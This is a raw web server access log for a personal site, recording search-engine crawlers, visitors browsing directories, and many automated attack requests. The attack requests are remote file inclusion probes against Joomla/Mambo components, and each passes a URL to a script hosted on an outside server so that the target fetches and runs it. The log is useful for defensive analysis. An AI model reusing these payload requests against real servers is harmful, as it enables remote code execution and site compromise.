74.6.25.135 - - [27/Dec/2007:17:00:40 -0800] "GET /presto/?D=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [27/Dec/2007:17:03:50 -0800] "GET /bikes/dteel/MVI_2430.AVI HTTP/1.0" 200 786432 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.26.118 - - [27/Dec/2007:17:04:48 -0800] "GET /funny/ HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.23.112 - - [27/Dec/2007:17:06:51 -0800] "GET /megumi/earrings/ HTTP/1.0" 200 2065 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.36.115.43 - - [27/Dec/2007:17:08:28 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "CazoodleBot/CazoodleBot-0.1 (CazoodleBot Crawler; http://www.cazoodle.com/cazoodlebot; cazoodlebot@cazoodle.com)" "www.dmulk.com"
72.36.115.43 - - [27/Dec/2007:17:08:28 -0800] "GET /logs/access_071028.log HTTP/1.0" 200 27183 "-" "CazoodleBot/CazoodleBot-0.1 (CazoodleBot Crawler; http://www.cazoodle.com/cazoodlebot; cazoodlebot@cazoodle.com)" "www.dmulk.com"
74.6.22.126 - - [27/Dec/2007:17:09:34 -0800] "GET /tmp/sess_21bd503992292f7bd7faa44928553825 HTTP/1.0" 403 163 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [27/Dec/2007:17:13:38 -0800] "GET /logs/access_071130.log HTTP/1.0" 200 58566 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [27/Dec/2007:17:13:40 -0800] "GET /logs/access_071010.log HTTP/1.0" 200 39814 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [27/Dec/2007:17:13:48 -0800] "GET /logs/access_070630.log HTTP/1.0" 200 36187 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [27/Dec/2007:17:16:32 -0800] "GET /logs/access_071216.log HTTP/1.0" 200 200644 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.23.206 - - [27/Dec/2007:17:18:30 -0800] "GET /logs/access_071002.log HTTP/1.0" 200 70737 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.30.179.227 - - [27/Dec/2007:17:20:00 -0800] "GET /logs/access_071031.log HTTP/1.0" 200 21492 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [27/Dec/2007:17:22:25 -0800] "GET /megumi/?M=A HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.30.179.215 - - [27/Dec/2007:17:22:32 -0800] "GET /logs/access_071109.log HTTP/1.0" 200 29983 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
156.3.74.18 - - [27/Dec/2007:17:28:11 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kunstverein-muenchen.de//webcalendar/images/.bash/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
156.3.74.18 - - [27/Dec/2007:17:28:21 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kunstverein-muenchen.de//webcalendar/images/.bash/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
156.3.74.18 - - [27/Dec/2007:17:28:34 -0800] "GET /logs/access_071214.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kunstverein-muenchen.de//webcalendar/images/.bash/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.55.0.12 - - [27/Dec/2007:17:31:58 -0800] "GET //components/com_rsgallery/rsgallery.php?mosConfig_absolute_path=http://www.business-technology-associates.com/offl//lib/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
69.55.0.12 - - [27/Dec/2007:17:32:01 -0800] "GET /logs//components/com_rsgallery/rsgallery.php?mosConfig_absolute_path=http://www.business-technology-associates.com/offl//lib/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
203.144.135.165 - - [27/Dec/2007:17:34:11 -0800] "GET /megumi/ HTTP/1.1" 200 937 "http://www.google.co.th/search?q=%22+parent+directory+%22megumi+-xxx+-html+-htm+-php+-shtml+-opendivx+-md5+-md5sums+&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
203.144.135.165 - - [27/Dec/2007:17:34:16 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
203.144.135.165 - - [27/Dec/2007:17:34:19 -0800] "GET /megumi/Bracelet/ HTTP/1.1" 200 1705 "http://www.dmulk.com/megumi/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
203.144.135.165 - - [27/Dec/2007:17:34:27 -0800] "GET /megumi/Necklace/ HTTP/1.1" 200 4323 "http://www.dmulk.com/megumi/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
203.144.135.165 - - [27/Dec/2007:17:34:34 -0800] "GET /megumi/earrings/ HTTP/1.1" 200 2081 "http://www.dmulk.com/megumi/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
74.6.23.70 - - [27/Dec/2007:17:38:15 -0800] "GET /bikes/dteel/03MAR07/?N=D HTTP/1.0" 200 692 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [27/Dec/2007:17:42:16 -0800] "GET /presto HTTP/1.0" 301 75 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [27/Dec/2007:17:42:18 -0800] "GET /presto/ HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
117.103.168.33 - - [27/Dec/2007:17:51:56 -0800] "GET /logs/access_071118.log HTTP/1.0" 200 27859 "http://www.google.com/search?hl=en&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&hs=Vej&q=auctions%2FphpAdsNew&btnG=Search" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" "www.dmulk.com"
117.103.168.33 - - [27/Dec/2007:17:51:57 -0800] "GET /favicon.ico HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" "www.dmulk.com"
117.103.168.33 - - [27/Dec/2007:17:51:57 -0800] "GET /favicon.ico HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0" "www.dmulk.com"
74.6.28.22 - - [27/Dec/2007:17:53:52 -0800] "GET /logs/access_070919.log HTTP/1.0" 200 35028 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.93.57.34 - - [27/Dec/2007:17:58:01 -0800] "GET /logs/access_071216.log/start.php?s=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.57.34 - - [27/Dec/2007:17:58:01 -0800] "GET /start.php?s=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.57.34 - - [27/Dec/2007:17:58:01 -0800] "GET /logs/start.php?s=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.57.34 - - [27/Dec/2007:17:58:12 -0800] "GET /logs/access_071214.log/start.php?s=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.22.126 - - [27/Dec/2007:17:58:53 -0800] "GET /logs/access_070704.log HTTP/1.0" 200 11515 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [27/Dec/2007:17:58:53 -0800] "GET /logs/access_070719.log HTTP/1.0" 200 50682 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [27/Dec/2007:18:00:03 -0800] "GET /plans/?N=D HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [27/Dec/2007:18:05:28 -0800] "GET /plans/A4_SCHEMAIC_SECTION.pdf HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.53.3.206 - - [27/Dec/2007:18:08:09 -0800] "GET /logs/access_071222.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.grafisk-design.no/modules/.../id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.3.206 - - [27/Dec/2007:18:08:09 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.grafisk-design.no/modules/.../id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.3.206 - - [27/Dec/2007:18:08:09 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.grafisk-design.no/modules/.../id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.169.228.157 - - [27/Dec/2007:18:10:08 -0800] "GET /logs/access_071214.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.169.228.157 - - [27/Dec/2007:18:10:09 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.169.228.157 - - [27/Dec/2007:18:10:09 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.129.193.100 - - [27/Dec/2007:18:11:15 -0800] "GET //config.inc.php?path_escape=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
216.129.193.100 - - [27/Dec/2007:18:11:15 -0800] "GET /logs//config.inc.php?path_escape=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
206.169.228.157 - - [27/Dec/2007:18:12:04 -0800] "GET /logs/access_071214.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.169.228.157 - - [27/Dec/2007:18:12:04 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.169.228.157 - - [27/Dec/2007:18:12:04 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.88.114.169 - - [27/Dec/2007:18:15:17 -0800] "GET //config.inc.php?path_escape=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
203.88.114.169 - - [27/Dec/2007:18:15:17 -0800] "GET /logs//config.inc.php?path_escape=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
65.55.209.207 - - [27/Dec/2007:18:22:24 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.209.207 - - [27/Dec/2007:18:22:25 -0800] "GET /mobilehackers/ HTTP/1.0" 401 395 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.209.207 - - [27/Dec/2007:18:22:29 -0800] "GET /backup/ HTTP/1.0" 401 395 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
12.196.243.8 - - [27/Dec/2007:18:24:14 -0800] "GET /logs/access_071216.log/start.php?s=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
12.196.243.8 - - [27/Dec/2007:18:24:16 -0800] "GET /start.php?s=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
12.196.243.8 - - [27/Dec/2007:18:24:17 -0800] "GET /logs/start.php?s=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
12.196.243.8 - - [27/Dec/2007:18:25:32 -0800] "GET /logs/access_071214.log/start.php?s=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
192.104.107.213 - - [27/Dec/2007:18:28:47 -0800] "GET /logs/access_071110.log//multithumb.php?mosConfig_absolute_path=http://pocketthemes.com/_tempthemes/AMITBAHL/errorr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
192.104.107.213 - - [27/Dec/2007:18:28:47 -0800] "GET //multithumb.php?mosConfig_absolute_path=http://pocketthemes.com/_tempthemes/AMITBAHL/errorr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
192.104.107.213 - - [27/Dec/2007:18:28:47 -0800] "GET /logs//multithumb.php?mosConfig_absolute_path=http://pocketthemes.com/_tempthemes/AMITBAHL/errorr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
192.104.107.213 - - [27/Dec/2007:18:28:47 -0800] "GET /logs/access_071110.log//multithumb.php?mosConfig_absolute_path=http://pocketthemes.com/_tempthemes/AMITBAHL/errorr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
192.104.107.213 - - [27/Dec/2007:18:28:48 -0800] "GET //multithumb.php?mosConfig_absolute_path=http://pocketthemes.com/_tempthemes/AMITBAHL/errorr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
192.104.107.213 - - [27/Dec/2007:18:28:48 -0800] "GET /logs//multithumb.php?mosConfig_absolute_path=http://pocketthemes.com/_tempthemes/AMITBAHL/errorr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
192.104.107.213 - - [27/Dec/2007:18:28:48 -0800] "GET /logs/access_071110.log//multithumb.php?mosConfig_absolute_path=http://pocketthemes.com/_tempthemes/AMITBAHL/errorr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
192.104.107.213 - - [27/Dec/2007:18:28:48 -0800] "GET //multithumb.php?mosConfig_absolute_path=http://pocketthemes.com/_tempthemes/AMITBAHL/errorr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
192.104.107.213 - - [27/Dec/2007:18:28:49 -0800] "GET /logs//multithumb.php?mosConfig_absolute_path=http://pocketthemes.com/_tempthemes/AMITBAHL/errorr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.56.2 - - [27/Dec/2007:18:29:51 -0800] "GET /logs/access_071110.log//multithumb.php?mosConfig_absolute_path=http://pocketthemes.com/_tempthemes/AMITBAHL/errorr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.56.2 - - [27/Dec/2007:18:29:51 -0800] "GET //multithumb.php?mosConfig_absolute_path=http://pocketthemes.com/_tempthemes/AMITBAHL/errorr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.56.2 - - [27/Dec/2007:18:29:51 -0800] "GET /logs//multithumb.php?mosConfig_absolute_path=http://pocketthemes.com/_tempthemes/AMITBAHL/errorr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
192.104.107.213 - - [27/Dec/2007:18:30:29 -0800] "GET /logs/access_071110.log//multithumb.php?mosConfig_absolute_path=http://pocketthemes.com/_tempthemes/AMITBAHL/errorr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
192.104.107.213 - - [27/Dec/2007:18:30:29 -0800] "GET //multithumb.php?mosConfig_absolute_path=http://pocketthemes.com/_tempthemes/AMITBAHL/errorr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
192.104.107.213 - - [27/Dec/2007:18:30:30 -0800] "GET /logs//multithumb.php?mosConfig_absolute_path=http://pocketthemes.com/_tempthemes/AMITBAHL/errorr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
192.104.107.213 - - [27/Dec/2007:18:30:31 -0800] "GET /logs/access_071110.log//multithumb.php?mosConfig_absolute_path=http://pocketthemes.com/_tempthemes/AMITBAHL/errorr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
192.104.107.213 - - [27/Dec/2007:18:30:31 -0800] "GET //multithumb.php?mosConfig_absolute_path=http://pocketthemes.com/_tempthemes/AMITBAHL/errorr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
192.104.107.213 - - [27/Dec/2007:18:30:31 -0800] "GET /logs//multithumb.php?mosConfig_absolute_path=http://pocketthemes.com/_tempthemes/AMITBAHL/errorr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
192.104.107.213 - - [27/Dec/2007:18:30:37 -0800] "GET /logs/access_071110.log//multithumb.php?mosConfig_absolute_path=http://pocketthemes.com/_tempthemes/AMITBAHL/errorr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
192.104.107.213 - - [27/Dec/2007:18:30:38 -0800] "GET //multithumb.php?mosConfig_absolute_path=http://pocketthemes.com/_tempthemes/AMITBAHL/errorr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
192.104.107.213 - - [27/Dec/2007:18:30:38 -0800] "GET /logs//multithumb.php?mosConfig_absolute_path=http://pocketthemes.com/_tempthemes/AMITBAHL/errorr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.56.2 - - [27/Dec/2007:18:31:33 -0800] "GET /logs/access_071110.log//multithumb.php?mosConfig_absolute_path=http://pocketthemes.com/_tempthemes/AMITBAHL/errorr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.56.2 - - [27/Dec/2007:18:31:33 -0800] "GET //multithumb.php?mosConfig_absolute_path=http://pocketthemes.com/_tempthemes/AMITBAHL/errorr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.56.2 - - [27/Dec/2007:18:31:33 -0800] "GET /logs//multithumb.php?mosConfig_absolute_path=http://pocketthemes.com/_tempthemes/AMITBAHL/errorr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.140.91.131 - - [27/Dec/2007:18:31:39 -0800] "GET /logs/access_071110.log//multithumb.php?mosConfig_absolute_path=http://www.instanton.it/joomla/templates/id???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.140.91.131 - - [27/Dec/2007:18:31:39 -0800] "GET /logs/access_071110.log//multithumb.php?mosConfig_absolute_path=http://www.rb-club.biz/modules/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.140.91.131 - - [27/Dec/2007:18:31:39 -0800] "GET //multithumb.php?mosConfig_absolute_path=http://www.rb-club.biz/modules/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.140.91.131 - - [27/Dec/2007:18:31:41 -0800] "GET /logs//multithumb.php?mosConfig_absolute_path=http://www.rb-club.biz/modules/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.140.91.131 - - [27/Dec/2007:18:31:41 -0800] "GET //multithumb.php?mosConfig_absolute_path=http://www.instanton.it/joomla/templates/id???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.140.91.131 - - [27/Dec/2007:18:31:42 -0800] "GET /logs//multithumb.php?mosConfig_absolute_path=http://www.instanton.it/joomla/templates/id???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.3.206 - - [27/Dec/2007:18:32:53 -0800] "GET /logs/access_071205.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.grafisk-design.no/modules/.../id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.22.126 - - [27/Dec/2007:18:32:57 -0800] "GET /bikes/dteel/?D=A HTTP/1.0" 200 8117 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [27/Dec/2007:18:33:02 -0800] "GET /bikes/dteel/?N=D HTTP/1.0" 200 8117 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
210.5.53.3 - - [27/Dec/2007:18:34:48 -0800] "GET /logs/access_071110.log//multithumb.php?mosConfig_absolute_path=http://pocketthemes.com/_tempthemes/AMITBAHL/errorr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
210.5.53.3 - - [27/Dec/2007:18:34:48 -0800] "GET //multithumb.php?mosConfig_absolute_path=http://pocketthemes.com/_tempthemes/AMITBAHL/errorr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
210.5.53.3 - - [27/Dec/2007:18:34:49 -0800] "GET /logs//multithumb.php?mosConfig_absolute_path=http://pocketthemes.com/_tempthemes/AMITBAHL/errorr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.140.91.131 - - [27/Dec/2007:18:35:25 -0800] "GET /logs/access_071110.log//multithumb.php?mosConfig_absolute_path=http://www.instanton.it/joomla/templates/id???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.140.91.131 - - [27/Dec/2007:18:35:25 -0800] "GET //multithumb.php?mosConfig_absolute_path=http://www.instanton.it/joomla/templates/id???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.140.91.131 - - [27/Dec/2007:18:35:26 -0800] "GET /logs/access_071110.log//multithumb.php?mosConfig_absolute_path=http://www.rb-club.biz/modules/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.140.91.131 - - [27/Dec/2007:18:35:26 -0800] "GET /logs//multithumb.php?mosConfig_absolute_path=http://www.instanton.it/joomla/templates/id???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.140.91.131 - - [27/Dec/2007:18:35:26 -0800] "GET //multithumb.php?mosConfig_absolute_path=http://www.rb-club.biz/modules/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.140.91.131 - - [27/Dec/2007:18:35:27 -0800] "GET /logs//multithumb.php?mosConfig_absolute_path=http://www.rb-club.biz/modules/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
192.104.107.213 - - [27/Dec/2007:18:38:16 -0800] "GET /logs/access_071222.log//multithumb.php?mosConfig_absolute_path=http://pocketthemes.com/_tempthemes/AMITBAHL/errorr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
192.104.107.213 - - [27/Dec/2007:18:38:16 -0800] "GET /logs/access_071222.log//multithumb.php?mosConfig_absolute_path=http://pocketthemes.com/_tempthemes/AMITBAHL/errorr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
192.104.107.213 - - [27/Dec/2007:18:38:18 -0800] "GET /logs/access_071222.log//multithumb.php?mosConfig_absolute_path=http://pocketthemes.com/_tempthemes/AMITBAHL/errorr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.22.126 - - [27/Dec/2007:18:38:45 -0800] "GET /bikes/?D=A HTTP/1.0" 200 2036 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
82.140.91.131 - - [27/Dec/2007:18:38:45 -0800] "GET /logs/access_071222.log//multithumb.php?mosConfig_absolute_path=http://www.instanton.it/joomla/templates/id???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.140.91.131 - - [27/Dec/2007:18:38:48 -0800] "GET /logs/access_071222.log//multithumb.php?mosConfig_absolute_path=http://www.rb-club.biz/modules/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.87.56.2 - - [27/Dec/2007:18:39:14 -0800] "GET /logs/access_071222.log//multithumb.php?mosConfig_absolute_path=http://pocketthemes.com/_tempthemes/AMITBAHL/errorr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.243.138.92 - - [27/Dec/2007:18:41:37 -0800] "GET /funny/ HTTP/1.1" 200 808 "http://www.google.com/search?q=-inurl:htm+-inurl:html+-inurl:asp+intitle:%22index+of%22+%2B(wmv)+%2Bfunny+&hl=en&start=100&sa=N" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
70.243.138.92 - - [27/Dec/2007:18:41:38 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
70.243.138.92 - - [27/Dec/2007:18:41:45 -0800] "GET /funny/terryt1.wmv HTTP/1.1" 200 262144 "http://www.dmulk.com/funny/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
70.243.138.92 - - [27/Dec/2007:18:41:49 -0800] "GET /funny/terryt1.wmv HTTP/1.1" 200 196608 "-" "NSPlayer/11.0.5721.5145" "www.dmulk.com"
